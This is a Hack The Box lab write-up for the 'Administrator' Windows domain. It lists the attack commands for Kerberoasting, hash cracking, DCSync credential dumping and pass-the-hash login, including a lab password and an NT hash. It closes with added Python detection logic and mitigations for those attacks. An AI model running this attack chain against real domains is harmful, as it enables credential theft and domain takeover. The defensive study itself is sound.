Administrator (Hack The Box)

Created by nirza, March 02, 2025. Difficulty: Medium. OS: Windows.

I start with a scan of all ports, then a version and script scan of the open ports that the first scan found:

```bash
nmap -p- --open --min-rate 5000 -Pn -sS 10.10.11.42 -oG scan
nmap -p21,53,88,135,139,389,445,464,593,636,3268,3269,5985,9389,47001,49664,49665,49667,49668,52151,56764,60584,60595,60600,60603,60623 -sCV -Pn 10.10.11.42 -oN ports
```

I try to find something interesting in the SMB shares using the credentials provided by HTB, but there is nothing useful there. Next I enumerate the domain with ldapdomaindump and BloodHound to look for paths to escalate privileges:

```bash
ldapdomaindump -u 'ADMINISTRATOR.HTB\olivia' -p 'ichliebedich' 10.10.11.42
bloodhound-python -u 'olivia' -p 'ichliebedich' -ns 10.10.11.42 -d administrator.htb --zip
```

I list the users that have an SPN set and request a TGS for each of them. The user ethan has one, so I obtain his ticket hash (rdate first syncs my clock with the DC so Kerberos does not reject the request for clock skew):

```bash
rdate -n 10.10.11.42; impacket-GetUserSPNs administrator.htb/olivia:ichliebedich -request
```

I crack the hash to recover ethan's clear-text password:

```bash
hashcat -m 13100 -a 0 TgS_ethan /usr/share/wordlists/rockyou.txt -o cracked.txt
```

Consulting BloodHound, I see that ethan can obtain the hashes of every user by performing a DCSync attack:

```bash
impacket-secretsdump administrator.htb/ethan@10.10.11.42
```

The dump gives me the NT hash of the Administrator user. I connect with it to the machine and read the second flag:

```bash
evil-winrm -u Administrator -H "3dc553ce4b9fd20bd016e098d2d2fd2e" -i 10.10.11.42
```
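The two steps that hand over the domain here, the Kerberoast of ethan and the DCSync as ethan, both leave distinctive traces in the Windows Security log of the domain controller: a 4769 service-ticket request with the RC4 encryption type (0x17) for a user-account SPN, and a 4662 event in which a principal that is not a domain controller exercises the DS-Replication-Get-Changes / DS-Replication-Get-Changes-All extended rights on the domain object. The following detector is an added example written for this page, not part of the original writeup or of any tool it uses; the event IDs, the 0x17 encryption type and the two replication GUIDs are documented Windows values, while the event records, the attacker address 10.10.14.5 and the field shape (one JSON object per line, as a SIEM export might produce) are constructed for illustration.

```python
"""Detection logic for Kerberoasting (4769/RC4) and DCSync (4662 with replication
rights), run over constructed Windows Security event records.

Added example, not part of the original writeup. Event IDs, the RC4 ticket
encryption type (0x17) and the replication control-access GUIDs are documented
Windows values; the sample events below are constructed for illustration.
"""
import json
from collections import defaultdict

# Extended rights (control-access GUIDs) that DCSync needs on the domain object.
DS_REPLICATION_GET_CHANGES = "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2"
DS_REPLICATION_GET_CHANGES_ALL = "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2"
REPLICATION_GUIDS = {DS_REPLICATION_GET_CHANGES, DS_REPLICATION_GET_CHANGES_ALL}

RC4_HMAC = "0x17"  # TicketEncryptionType of an RC4 service ticket (the crackable kind)

# Constructed sample events (field names follow Security log events 4769 and 4662).
SAMPLE_EVENTS = [
    {"EventID": 4769, "TargetUserName": "olivia@ADMINISTRATOR.HTB", "ServiceName": "ethan",
     "TicketEncryptionType": "0x17", "IpAddress": "10.10.14.5"},
    {"EventID": 4769, "TargetUserName": "olivia@ADMINISTRATOR.HTB", "ServiceName": "DC$",
     "TicketEncryptionType": "0x12", "IpAddress": "10.10.14.5"},
    {"EventID": 4769, "TargetUserName": "DC$@ADMINISTRATOR.HTB", "ServiceName": "krbtgt",
     "TicketEncryptionType": "0x12", "IpAddress": "10.10.11.42"},
    {"EventID": 4662, "SubjectUserName": "ethan", "ObjectType": "domainDNS",
     "Properties": "%%7688 " + DS_REPLICATION_GET_CHANGES + " " + DS_REPLICATION_GET_CHANGES_ALL},
    {"EventID": 4662, "SubjectUserName": "DC$", "ObjectType": "domainDNS",
     "Properties": "%%7688 " + DS_REPLICATION_GET_CHANGES},
    {"EventID": 4662, "SubjectUserName": "olivia", "ObjectType": "user",
     "Properties": "%%7688 bf967aba-0de6-11d0-a285-00aa003049e2"},
]


def is_machine_account(name):
    """Machine accounts end in '$' (before any @REALM suffix)."""
    return name.split("@", 1)[0].endswith("$")


def detect_kerberoast(events):
    """Flag accounts that request RC4-encrypted service tickets for user SPNs.

    An RC4 (0x17) TGS for a user-account SPN is the signature of a Kerberoast
    request; tickets for machine accounts (ending in '$') are normal traffic.
    Returns {requesting_account: sorted list of services requested}.
    """
    hits = defaultdict(set)
    for ev in events:
        if ev.get("EventID") != 4769:
            continue
        if ev.get("TicketEncryptionType") != RC4_HMAC:
            continue
        if is_machine_account(ev.get("ServiceName", "")):
            continue
        hits[ev["TargetUserName"]].add(ev["ServiceName"])
    return {acct: sorted(svcs) for acct, svcs in hits.items()}


def detect_dcsync(events, trusted_replicators=()):
    """Flag 4662 events where a non-DC principal exercises replication rights.

    Domain controllers (machine accounts) and any allow-listed replication
    identities (e.g. an Entra Connect service account) are ignored; everything
    else using these GUIDs is a DCSync indicator.
    Returns a sorted list of (subject, object_type) pairs.
    """
    findings = set()
    for ev in events:
        if ev.get("EventID") != 4662:
            continue
        props = set(ev.get("Properties", "").lower().split())
        if not props & REPLICATION_GUIDS:
            continue
        subject = ev.get("SubjectUserName", "")
        if is_machine_account(subject) or subject in trusted_replicators:
            continue
        findings.add((subject, ev.get("ObjectType", "")))
    return sorted(findings)


def sample_lines():
    """Serialise the constructed events as JSON lines, the form a SIEM export would have."""
    return [json.dumps(ev) for ev in SAMPLE_EVENTS]


def analyse(event_lines):
    """Run both detectors over JSON-encoded event lines (one event per line)."""
    events = [json.loads(line) for line in event_lines if line.strip()]
    return {"kerberoast": detect_kerberoast(events), "dcsync": detect_dcsync(events)}


if __name__ == "__main__":
    print(json.dumps(analyse(sample_lines()), indent=2))
```

On the constructed input the Kerberoast detector reports olivia requesting an RC4 ticket for ethan and the DCSync detector reports ethan replicating the domain object, while the DC's own ticket and replication traffic is ignored. The mitigations that remove the alerts at the source follow the same logic: enforce AES-only Kerberos for service accounts (or move them to gMSAs with long random passwords) so 4769 with 0x17 no longer occurs, and audit the domain object's ACL so that only domain controllers and a known replication identity hold the two replication rights.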